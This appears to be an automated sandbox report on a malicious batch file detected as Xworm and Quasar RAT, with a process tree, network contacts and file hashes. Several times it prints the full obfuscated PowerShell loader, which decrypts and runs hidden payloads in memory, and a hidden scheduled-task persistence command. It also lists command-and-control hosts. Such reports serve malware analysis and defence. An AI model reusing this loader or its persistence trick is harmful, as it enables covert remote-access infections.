Analysis Overview
SHA256
7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
Threat Level: Known bad
The file Double.bat was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Quasar RAT
Quasar payload
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-13 17:59
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-13 17:59
Reported
2024-04-13 18:01
Platform
win10v2004-20240412-en
Max time kernel
54s
Max time network
63s
Command Line
Signatures
Detect Xworm Payload
Quasar RAT
Quasar payload
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_330_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_330.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_330.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_330.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_330.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_330.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_585_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_585.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_585.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_585.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_585.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_585.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | traffic-collins.gl.at.ply.gg | udp |
| US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.118.77.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yiarmb3f.iuv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f8d49a4af7a844bfc7247d5670def557 |
| SHA1 | 26ae0ce194a77a7a1887cf93741293fdfa6c94c4 |
| SHA256 | 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b |
| SHA512 | 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c |
C:\Users\Admin\AppData\Roaming\startup_str_330.vbs
| MD5 | 20b8c2322d21131b9f33f7f8aa143e41 |
| SHA1 | 071b1e63bebd79345c9e62e8b81627fc639d611d |
| SHA256 | 0941acf3ffa1dc642b3b9913632e39fac19c63e97a3164159edb7edc5001f850 |
| SHA512 | 91c13b7188947250f5e19b8f64862fb3142198523094ba89b1fb0dcb50e12686dc4e147c084efe59cfcd3eb210ea623e6f38d60abb8d59960dff70d388306524 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\startup_str_330.bat
| MD5 | 948386c98184781df692e5f11ff558f7 |
| SHA1 | e8619faf83446ea78e456920834579bbf71aea20 |
| SHA256 | 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f |
| SHA512 | 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba |
C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat
| MD5 | 795363cfbf5d3fca47edc4cbc247a1c0 |
| SHA1 | 9374d05486b0b62977825d07f748fa03cca3c864 |
| SHA256 | 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6 |
| SHA512 | c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d51735559407dba515c4b8861b4c1a56 |
| SHA1 | 4902dbc4f4322b549c42ddec8d2e642c96491e9d |
| SHA256 | 24cf099c1f20992a70fb72d21f41b766178f71ee7585bac522c8dbb3ae06f263 |
| SHA512 | fe1a23a0273c2cbf7510023f4368d19b4aab362baae6a35698e29c8232aeaf8261fc9e351549a9d9aa1130230769e6d8206cbf757056400b5cbc823e2dcc010a |
C:\Users\Admin\AppData\Roaming\startup_str_585.vbs
| MD5 | 753fefb78d188fffd02e5630c438f15e |
| SHA1 | 54712eb2b053ab77eab8c43339ee1bfefe877c29 |
| SHA256 | 9151798d6f1e77daf9a6a495917d50bb3dc2f8b224fc29ee830caf4b3195fe26 |
| SHA512 | 558240ecabdcaeed3c2358fdebb718e49f7f2b5b4d4735c2c16809c727d88c5cca141b27af9ff0daccfb52208851a9251abd06ed2ac75cb496c228dc06da59fb |
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-13 17:59
Reported
2024-04-13 18:01
Platform
win11-20240412-en
Max time kernel
54s
Max time network
62s
Command Line
Signatures
Detect Xworm Payload
Quasar RAT
Quasar payload
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_824_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_824.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_824.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_824.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_824.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_824.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_490_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_490.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_490.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_490.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_490.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_490.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3pqlkgi.ijq.ps1
